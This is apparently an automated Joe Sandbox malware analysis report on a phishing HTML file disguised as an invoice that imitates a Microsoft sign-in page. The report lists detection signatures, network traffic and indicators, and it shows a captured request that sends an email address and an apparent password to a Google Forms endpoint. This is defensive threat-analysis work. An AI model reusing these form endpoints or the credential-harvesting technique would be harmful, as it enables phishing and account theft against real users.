Edit tour

Windows Analysis Report
Invoice for 04-09-24 fede39.admr.org.html

Overview

General Information

Sample name:	Invoice for 04-09-24 fede39.admr.org.html
Analysis ID:	1578804
MD5:	c88d4662a0a1d7d26db3ea7932ce0c33
SHA1:	ade5a862c04e71973237ed97a4e19acda2174096
SHA256:	bfba0d8b3a7238ca9ff16c92b87542a6ef5ed311bb074f6f35b20c01812bc22a
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

AI detected landing page (webpage, office document or email)

AI detected suspicious Javascript

HTML document with suspicious name

HTML document with suspicious title

HTML file submission containing password form

Suspicious Javascript code found in HTML file

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

IP address seen in connection with other malware

Invalid 'forgot password' link found

Invalid T&C link found

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Invoice for 04-09-24 fede39.admr.org.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=2028,i,1571332865371806087,6654669656635334013,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.1.pages.csv

AI detected landing page (webpage, office document or email)

Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html

Joe Sandbox AI: Page contains button: 'Verify' Source: '0.0.pages.csv'

AI detected suspicious Javascript

Source: 1.1.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Invoice%20for%2004... This script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and redirects to potentially malicious domains. The script collects user email and password information and sends it to a Google Forms URL, which could be used for phishing or other malicious purposes. Additionally, the script uses obfuscated code and conditional logic to determine the appropriate URL to send the data to, further increasing the risk. While the script may have some legitimate functionality, the overall risk profile is high due to the sensitive data collection and transmission to potentially untrusted domains.

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html

Tab title: Sign in to your account

Suspicious Javascript code found in HTML file

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: .location
Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: .location

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Number of links: 0

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: <input type="password" .../> found but no <form action="...

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: Title: Sign in to your account does not match URL
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Title: Sign in to your account does not match URL

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: Invalid link: Forgot password?
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Forgot password?

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: Invalid link: Terms of use
Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: Invalid link: Privacy & cookies

Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html

HTTP Parser: Has password / email / username input fields

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: <input type="password" .../> found

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="author".. found

Source: Invoice for 04-09-24 fede39.admr.org.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49809 version: TLS 1.0

Source: Joe Sandbox View	IP Address: 151.101.1.229 151.101.1.229
Source: Joe Sandbox View	IP Address: 172.67.41.16 172.67.41.16
Source: Joe Sandbox View	IP Address: 104.22.21.144 104.22.21.144
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 1138de370e523e824bbca92d049a3777

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49809 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cdn.tailwindcss.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /3.4.16 HTTP/1.1Host: cdn.tailwindcss.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/animejs@3.2.2/lib/anime.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /3.4.16 HTTP/1.1Host: cdn.tailwindcss.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: cdn.tailwindcss.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: docs.google.com

Source: unknown

HTTP traffic detected: POST /forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/formResponse?usp=pp_url&entry.709402199=support_gestsup@fede39.admr.org&entry.1191394999=+kx3:d@JYacMd5, HTTP/1.1Host: docs.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: nullX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: Invoice for 04-09-24 fede39.admr.org.html	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: Invoice for 04-09-24 fede39.admr.org.html	String found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031be
Source: Invoice for 04-09-24 fede39.admr.org.html	String found in binary or memory: https://cdn.jsdelivr.net/npm/animejs
Source: Invoice for 04-09-24 fede39.admr.org.html	String found in binary or memory: https://cdn.tailwindcss.com
Source: Invoice for 04-09-24 fede39.admr.org.html	String found in binary or memory: https://docs.google.com/forms/d/e/1FAIpQLSeucJe0jbBSKCkR6MT2cQy0ZZA-Q8--35vK_jFOpbV5M_lMtQ/viewform?
Source: Invoice for 04-09-24 fede39.admr.org.html	String found in binary or memory: https://docs.google.com/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/formRespo
Source: Invoice for 04-09-24 fede39.admr.org.html	String found in binary or memory: https://docs.google.com/forms/u/0/d/e/1FAIpQLSeiv3vsClWAvMv6ARIhv9YuOQcratL-kX4KvYhzJyeIpSsUTg/formR
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://evilmartians.com/chronicles/postcss-8-plugin-migration
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://github.com/browserslist/browserslist#readme
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://github.com/jonschlinkert/fill-range
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://github.com/jonschlinkert/is-number
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://github.com/micromatch/to-regex-range
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://github.com/postcss/autoprefixer#readme
Source: Invoice for 04-09-24 fede39.admr.org.html	String found in binary or memory: https://logincdn.msauth.net/shared/5/js/../images/2_bc3d32a696895f78c19d.svg
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://mths.be/cssesc
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://tailwindcss.com/docs/installation
Source: chromecache_90.2.dr, chromecache_89.2.dr	String found in binary or memory: https://twitter.com/browserslist

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

System Summary

HTML document with suspicious name

Source: Name includes: Invoice for 04-09-24 fede39.admr.org.html

Initial sample: invoice

Source: classification engine

Classification label: mal72.phis.winHTML@24/21@16/9

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Invoice for 04-09-24 fede39.admr.org.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=2028,i,1571332865371806087,6654669656635334013,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=2028,i,1571332865371806087,6654669656635334013,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html

HTTP Parser: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Name	IP	Active	Malicious	Reputation
jsdelivr.map.fastly.net	151.101.1.229	true	false	high
docs.google.com	142.250.181.110	true	false	high
cdn.tailwindcss.com	104.22.21.144	true	false	high
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false	high
www.google.com	142.250.181.132	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
cdn.jsdelivr.net	unknown	unknown	false	high
aadcdn.msftauth.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://cdn.tailwindcss.com/	false	high
https://cdn.tailwindcss.com/3.4.16	false	high
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg	false	high
https://cdn.jsdelivr.net/npm/animejs@3.2.2/lib/anime.min.js	false	high
file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://cdn.tailwindcss.com	Invoice for 04-09-24 fede39.admr.org.html	false	high
https://docs.google.com/forms/d/e/1FAIpQLSeucJe0jbBSKCkR6MT2cQy0ZZA-Q8--35vK_jFOpbV5M_lMtQ/viewform?	Invoice for 04-09-24 fede39.admr.org.html	false	high
https://tailwindcss.com/docs/installation	chromecache_90.2.dr, chromecache_89.2.dr	false	high
https://github.com/jonschlinkert/fill-range	chromecache_90.2.dr, chromecache_89.2.dr	false	high
https://github.com/postcss/autoprefixer#readme	chromecache_90.2.dr, chromecache_89.2.dr	false	high
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031be	Invoice for 04-09-24 fede39.admr.org.html	false	high
https://evilmartians.com/chronicles/postcss-8-plugin-migration	chromecache_90.2.dr, chromecache_89.2.dr	false	unknown
https://docs.google.com/forms/u/0/d/e/1FAIpQLSeiv3vsClWAvMv6ARIhv9YuOQcratL-kX4KvYhzJyeIpSsUTg/formR	Invoice for 04-09-24 fede39.admr.org.html	false	high
https://github.com/micromatch/to-regex-range	chromecache_90.2.dr, chromecache_89.2.dr	false	high
https://mths.be/cssesc	chromecache_90.2.dr, chromecache_89.2.dr	false	unknown
https://cdn.jsdelivr.net/npm/animejs	Invoice for 04-09-24 fede39.admr.org.html	false	high
https://github.com/browserslist/browserslist#readme	chromecache_90.2.dr, chromecache_89.2.dr	false	high
https://twitter.com/browserslist	chromecache_90.2.dr, chromecache_89.2.dr	false	high
https://github.com/jonschlinkert/is-number	chromecache_90.2.dr, chromecache_89.2.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.1.229	jsdelivr.map.fastly.net	United States	54113	FASTLYUS	false
172.67.41.16	unknown	United States	13335	CLOUDFLARENETUS	false
104.22.21.144	cdn.tailwindcss.com	United States	13335	CLOUDFLARENETUS	false
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
142.250.181.110	docs.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
152.199.21.175	sni1gl.wpc.omegacdn.net	United States	15133	EDGECASTUS	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578804
Start date and time:	2024-12-20 13:45:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
